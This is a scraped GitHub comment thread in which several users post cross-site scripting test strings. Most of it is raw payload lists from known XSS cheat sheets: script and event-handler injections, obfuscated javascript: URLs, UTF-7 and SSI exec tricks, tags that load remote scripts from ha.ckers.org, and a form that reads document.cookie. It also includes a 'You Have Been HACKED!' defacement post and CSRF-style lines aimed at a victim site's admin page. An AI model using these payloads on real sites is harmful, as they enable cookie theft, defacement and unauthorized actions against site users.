(.alerr(document.domin);>

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

lol

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

%0a%0d

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

[onerror=alert-xss]

@n0bugs

This comment has been minimized.

Copy link

@n0bugs n0bugs commented Feb 8, 2020

@YudTam

This comment has been minimized.

Copy link

@YudTam YudTam commented Feb 23, 2020

@mrbeast0510

This comment has been minimized.

Copy link

@mrbeast0510 mrbeast0510 commented Mar 5, 2020

<script>alert(1)</script>
@Liosion

This comment has been minimized.

Copy link

@Liosion Liosion commented Mar 27, 2020

<script language="php">echo phpinfo();</script>
@Liosion

This comment has been minimized.

Copy link

@Liosion Liosion commented Mar 27, 2020

</script><script>alert(1)</script>

@Liosion

This comment has been minimized.

Copy link

@Liosion Liosion commented Mar 27, 2020

</script><script>alert(1)</script>

@rangeethmj

This comment has been minimized.

Copy link

@rangeethmj rangeethmj commented Mar 29, 2020

@rangeethmj

This comment has been minimized.

Copy link

@rangeethmj rangeethmj commented Mar 29, 2020

Hacked

@rangeethmj

This comment has been minimized.

Copy link

@rangeethmj rangeethmj commented Mar 29, 2020

You Have Been HACKED!

@rangeethmj

This comment has been minimized.

Copy link

@rangeethmj rangeethmj commented Mar 29, 2020

<TITLE>D3F4C3</TITLE>
                                                           vB@@@B@B@B@Mu.                                                                         
                                                        ,O@B@B@@@B@B@B@B@Bi                                                                       
                                                       ZB@B@B@B@BBMBBBB@@@B@G7                                                                    
                                                     :@@@B@BBBBMBM@MBB@B@B@B@B@ML                                                                 
                                                   .M@B@BBMBMBM@MBB@M@BBB@M@B@B@B@Mi                                                              
                                                  Z@@@@MBMBMBM@BB@@B@B@B@B@M@M@B@B@B@5                                                            
                                                7@B@BBBBB@BBB@B@MBBBMBB@MBMBMBMBB@@@B@@O                                                          
                                               Z@B@B@MBMBBBBBBBMBM@MBMBBBB@MBM@BBMBB@@@B@P                                                        
                                             iB@@@@@BBMBM@BBMBBBBBMBB@M@B@B@M@BBM@MBM@B@@@@Y                                                      
                                            qB@B@B@MBMBB@BBM@BBB@M@B@BBB@B@M@B@M@M@M@B@M@B@B@.                                                    
                                           @B@BBMMMBMBMBM@B@B@MBBBM@BBBBB@M@B@B@M@MBMBMBB@B@B@U                                                   
                                         .@B@BMMMMBMBMBMBMBMBMBMBMBMBBBM@MBMBBBM@BBMBBBBBMBB@B@Z                                                  
                                        :@B@MBMBMBMBMBMBMBMBBBMBMBMBBBMBMBBBMBMBBBBBMBMBBBMBM@B@B                                                 
                                       .@B@MMMBBBM@B@B@B@B@MBMBBBBBMBMBBBMBBMMBMBM@BBBBMBMBMBB@B@B:                                               
                                       @BBMMMBB@BBM@BBBBB@B@BBMBMBMBBBB@B@BBBBMBMBBBMBMBMBMBMBMBB@B0                                              
                                      @BBMBM@B@B@BBMBMBBBMBBBMBB@BBM@B@M@MBB@M@B@B@MBBBB@BBBBBBM@B@B@L                                            
                                     @B@B@BBB@B@M@MBMBMBMBM@B@B@B@BBBBM@MBBBBBM@B@MBMBMBMBMBMBMBMBB@B@B:                                          
                                    SB@BBM@BBMBMMMBMBM@B@B@B@B@M@M@MBM@M@B@MBBBB@MBM@BBBBMBBBMMMMMBM@B@BM.                                        
                                   7B@B@MBMMOMOMMBB@B@B@B@BBM@B@M@B@BBBBBBB@M@BBBBMBMBM@BBB@MBBBMBMMMMM@@@S                                       
                                  rB@BBMMOMMBM@B@BBM@B@MBBBBBB@BBM@B@B@B@B@B@B@B@B@B@B@MBBBMBBBMBB@BBMMMBB@B;                                     
                                 ,B@BMOMMBBBMBB@M@MBB@BBM@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@B@BBBBMBMBMBMBB@BM                                    
                                 B@MMOBB@B@BBBBB@BBB@BBM@B@@@B@B@B@B@B@B@MPYF0BB@B@B@B@B@@@B@B@B@B@B@B@MBBBB@@@:                                  
                                B@MBB@M@MBM@M@M@MBB@B@@@B@B@B@B@B@O2i.              :u0@B@@@B@B@@@B@B@B@B@B@B@B@Y                                 
                               F@B@BBMBMBMBMBBBB@B@B@B@B@@@B@Z1i.                       :rFM@B@B@B@B@B@B@B@B@B@B@BL                               
                              .@B@MBMBMBM@BBBBB@@@B@B@B@Bki.                     ....,.... .:YN@B@@@B@@@B@B@B@B@@@B@:                             
                              @@BMMMBB@B@B@@@B@B@@@@@@F:.                           ...,:,:::::iJG@B@B@B@B@B@B@B@@@B@O                            
                             Y@@BBM@B@B@B@B@@@B@B@0k:   ....                               .:irv7LuZB@B@B@B@B@B@B@@@B@@L                          
                             B@B@B@@@B@B@B@B@B@B1,   ......                               ::rr77uSFjPM@B@B@B@B@B@@@B@B@BO                         
                            8@B@B@B@B@B@@@B@BOj;:i::.                               ,YkGGOOOGMEXUXZNkNO@B@B@@@@@@@B@B@B@Bq                        
                           L@B@B@B@@@B@B@B@MESNGMOO8EU7.                         iNMMkuj22Pq88O8GqOMZNGM@B@B@B@@@@@B@@@B@BL                       
                          .@B@B@@@B@B@@@@@BOM@BMO8XSU2u2ULi.                   UMq77LqB@B@B@B@B@B@E@M8OOM@B@B@B@B@B@@@B@B@B                       
                          @B@B@B@B@B@B@B@MBB@B@B@B@@@B0Yr,:iri.              LE7:vMB@@@BM27iri7uGBBG@OM8BB@@@B@B@B@B@B@B@B@J                      
                         ,@@@@B@B@B@B@B@GO@@B@BMOOO@B@B@B@q7..:7i.         :1i.7B@B@B0i.        .LOEMBM8M@B@@@B@B@@@B@@@@@B@                      
                         J@@@B@@@@@B@B@M0M@Mui:,:.. ,;kB@@@B@M;.rL:       rv.0@@@B@1:           .iqOMBMZ@B@B@@@B@B@B@B@B@B@B                      
                         OB@B@B@B@B@B@qEG@MY:.          .2B@@@B@ ...     .: L@B@B1:          ..,:L0@@BGOB@B@B@B@B@B@B@B@B@B@.                     
                         @@B@B@@@B@B@BPqMB8vi,..           :U00.             UqL:           ..::72MB@O8M@B@B@B@@@B@B@B@B@B@B.                     
                         @B@@@B@B@B@B@OEP@MYi:..             .iv;          uPui.             ,ivuEM@OG0BB@B@B@B@B@B@B@B@B@B@.                     
                         B@B@B@B@@@B@B@GuG@jr,. .:;r77vv7:     .L7        OG;.    .:7J15PqOMOu7L5XOFqZEXMB@B@B@B@B@B@B@B@B@@,                     
                         @B@B@B@B@B@B@BBjLB5i:v@BOk1YLYUFGMMqL   ::      r5i.  v0NSS2uYuj2U5N@@kNBSS5P00P@B@@@B@@@B@B@B@B@B@                      
                         B@@@B@B@B@B@B8M5iMBLX@O;7kP0PENSuY7YO@i  :      ii, .@B1N@B@B@B@B@BE:@@@@@NMEXEO@@B@B@B@B@B@B@@@B@M                      
                         @B@B@B@B@B@BBOBkGB@B@B.i@B@B@@@B@B@: X@  ..     i:, 5B  rE@B@@@B@OZq@B@Xju0qqZZB@B@@@B@B@@@B@B@B@Bi                      
                         B@B@BBB@B@B@@BBBB@BB0BB8U1XOO85J:  .u@i  ..     ,:.  u0v,...:i;r7XGS:     .EGNO@B@@@B@B@B@B@B@@@B@                       
                         PB@B@B@B@B@B@@@BOY.    LEqSY7iirLUPUr    ..     ::.    .i;7rr;;::,         .qZ8B@@@B@B@B@B@B@B@B@M                       
                         i@@@B@B@B@B@B@@P:           ....         .      ,:.                      ..:LMO@B@B@B@B@B@B@B@B@B                        
                          @@B@B@B@B@B@BML:                        ..     ,...                  ..,,::2M@B@B@B@B@B@@@B@B@B2                        
                          @B@B@B@B@B@B@MY.. .                     .      .,..               ....::i:;N@B@B@B@B@@@@@B@B@@@                         
                          L@B@B@B@B@B@B@u:.... .                         .....             ..,,::iiiu@B@B@B@B@B@B@B@B@B@r                         
                          .B@@@B@B@@@B@BML:,,....                         ,....           ..::::iiru@N@B@@@B@B@B@B@B@B@B                          
                           @@@B@B@B@B@B@O@Sr:,.,.                  .      .,. ..::         ..,,:iY0@YGB@B@B@B@B@B@@@B@B                           
                           B@B@B@B@B@B@Bqv@GL:,.          :::     .       ...   iuXPSYr:,....,i7XB@rvB@B@B@B@B@B@B@B@@1                           
                           @@@B@B@B@B@B@@i.MB0Jr:::i;7vuuJr,,.    .        ,.   .::v18M@MMZXSPZ@BO..@@B@B@@@B@B@B@B@B@                            
                           B@B@B@B@@@B@B@B. M@@BBMG0Ekur:.  .:    .        .:  iX:    .:7vS@@B@BJ  S@BMB@B@B@B@B@B@B@,                            
                           @B@B@B@B@B@B@@@M i@vM@@X          ruFr.         :7qB@G         0@B@82  i@BBZ@B@B@B@B@B@B@B                             
                           M@@@B@B@@@B@BBB@0 :N ZB@u          :q@BO7     .78@@2i.        0@B@L2.  @BBNMB@B@@@B@B@@@B                              
                           rB@B@B@B@B@B@B@B@u ,u ZB@X           ,@B@B8kkE@B@B1          O@@@L7i  E@@ZqB@B@B@B@B@B@Bq                              
                            @B@@@B@B@@@B@O@B@r :L BB@8:        ,@B@B@B@B@B@B@BO.  ..r2MB@B@j:L  rBMOPO@B@B@B@B@B@@@.                              
                            :@@@B@B@B@B@BMO@B@, ir @B@@@B@B@@@B@B@B@B@X1B@B@B@B@B@B@@@B@B@1.5  .BMZEX@B@B@B@@@B@B@B                               
                             B@B@B@B@B@B@BMB@@@. i7 FB@B@B@@@B@B@B@B@:   8@B@@@B@B@B@B@B@7 P.  B@X8PBB@@@B@B@B@B@B@                               
                              B@B@B@@@B@B@BBB@B@  iU   iuGB@B@B@B@B@:     M@B@@@M8Sur:.  :O:  X@k0qBB@B@B@B@B@B@B@B                               
                              J@@B@B@B@B@B@BBB@B@  :qr        .,:,iB@B@B@B@B8          .ZBi  J@kPPM@@B@B@B@B@B@@@B@                               
                             iB@B@B@B@B@B@B@@BM@BB  .UUL:.                          i1M@Mi  r@qSkM@@B@B@B@B@B@B@B@J                               
                            i@@B@B@B@B@B@B@B@@BO@BO   7rrvJ7i,.                .iuEOGkPqi  i@Z2SMB@B@B@B@B@B@B@B@B7                               
                           YB@B@B@B@B@B@B@B@B@BMGMBO   7i..:rvvLuEBGuJJuYUuU0BM@Mk7i:Lqi  :@Ou2BB@B@B@B@@@@@B@B@B@B@Or                            
                          LB@B@B@B@B@B@@@@@B@B@B@G8@8   r:.   . ,i0B@B@B@B@B@G5r:.,,rXi  ,@OJ2@B@B@B@B@B@B@@@B@B@B@@@@@0i                         
                      .kB@B@@@B@B@B@B@B@B@B@B@B@B@80OO.  i:         B@B@B@BM     .,:u7  :@8LS@@@B@B@@@B@B@B@B@B@B@@@B@@@B@@u.                     
                    LB@B@B@B@B@B@B@B@B@B@B@B@B@B@B@MSqM:  i:.       ZB@B@B@B    ..,rY  ,@ELX@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@82r,               
                 vM@B@B@B@B@B@B@B@@@B@B@B@B@B@@@B@@@B1YOr  ::.      M@B@B@B@:    .,7  ,@qvE@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B01v:       
            :YMB@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@2iXY  ,:      O@@@@@@B;    .:  :@kjM@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@L    
     :rFO@@@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@BGrJj: ,,     r@B@B@B@:    .  :MXPB@B@@@B@B@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@L 
.LMB@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@kjYi ..     B@@@B@B    .  :EZBB@@@B@B@@@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B

1@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@BZ2r OB@B@B@ ..:qB@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@@@B@B@B@@@M1: 7@B@@@M .,iZB@B@B@B@@@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@@@u: :B@B@BU ,;1@B@B@B@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@@@@@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@B@@@@@B@B@B@B@@@@@@@B@B@B@@@B@Bq7.,@@@B@,.vEB@B@@@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B
B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@@MM@B@M8B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@@@B@@@B@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@@@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@@@B@B@B@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@@@B@B@B@B@@@@@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@@@@@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@@@B@B@B@B@B@B@B@B@B@@@B@B@@@B@B@@@B@B@@@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@@@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@B@B@B@@@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@@@B@B@B@B@B@
@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@@@B@B@@@B@@@@@B@B@B@@@B@B@@@B@B@@@B@B@B@B@B@@@@@B@B
B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@
@B@B@B@@@B@B@B@B@B@B@B@B@@@B@@@B@B@@@B@B@@@@@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@@@@@B@B@@@B@B@B@@@B@@@B@B@@@B@B@B@B@@@B@B@B@B@B@B@B@@@B@B@B@@
MMMMOMMMMMMMOMMMOMOMMMMMMMMMMMMMOMMMMMMMOMMMMMMMOMMMOMOMMMMMOMMMMMMMMMMMMMMMOMMMMMMMMMOMOMMMMMMMOMMMOMMMMMMMMMMMOMMMMMOMMMMMMMOMMMOMOMMMMMMMMMOMMMMMOM

@andika085716730646

This comment has been minimized.

@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(�XSS�)</script> <script>alert(�XSS�);</script> <script>alert(�XSS�)</script>

�><script>alert(�XSS�)</script>

<script>alert(/XSS�)</script> <script>alert(/XSS/)</script>

</script><script>alert(1)</script>
�; alert(1);
�)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<iframe %00 src=" javascript:prompt(1) "%00> <style>{font-family:'' <scRipt %00>alert(1) {Opera}

@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')

<script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( � <textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> X <script ~~~>alert(0%0)</script ~~~> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg>&lt;style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;> <input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ &lt;script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ &lt;/script //|\\ </font>/<svg>&lt;style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/&lt;/style> <p>&lt;a/href=&quot;javascript: javascript:prompt(1)&quot;&gt;<input type="X"><br /> &lt;/plaintext&gt;&lt;/|&gt;&lt;plaintext/onmouseover=prompt(1)<br /> </svg>''<svg>&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert(1) {Opera}<br /> <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button></p> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> &lt;iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var>
@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

Click Here
<img src="/" =_=" title="onerror='prompt(1)'">
<%

<script src="data:text/javascript,alert(1)"></script>

<iframe/src //onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X
http://www.<script>alert(1)</script .com

<iframe src=j a v a s c r&NewLine ; i p&N ewLine; t &T ab; :a &Tab ; l e &Ta b; r &T ab; t & Tab; 28 &Tab ; 1 &Ta b; %29></iframe> <script ?>alert(1) <iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>

@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

<script>// confirm(1);</script
<script onlypossibleinopera:-)> alert(1)
ClickMe

<script x> alert(1) </script 1=2
style="x:"> <--` --!>
@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";aler t(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert( String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search <script>alert("hellox worldss") </script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2? 8String.fromCharCode(88,83,83))//";alert(String.fromCharCode? (88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search

hellox worldss







...



lol

<style>

<script>alert(1)</script>"> <script>alert(1)</script>"> <script>alert(1)</script>"> "> <% foo>
LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari* [0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> LOL<script>alert(123)</script> <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz- binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=&gt; SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A
HREF="javascript:document.location='http://www.google.com/'">XS
S</A>
<A
HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</
A>
<
%3C
&lt
<
&LT
<
&#60
&#60
&#60
&#60
&#60
&#60
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<

@andika085716730646

This comment has been minimized.

Copy link

@andika085716730646 andika085716730646 commented Apr 29, 2020

<IMG SRC="javascript:alert('XSS');">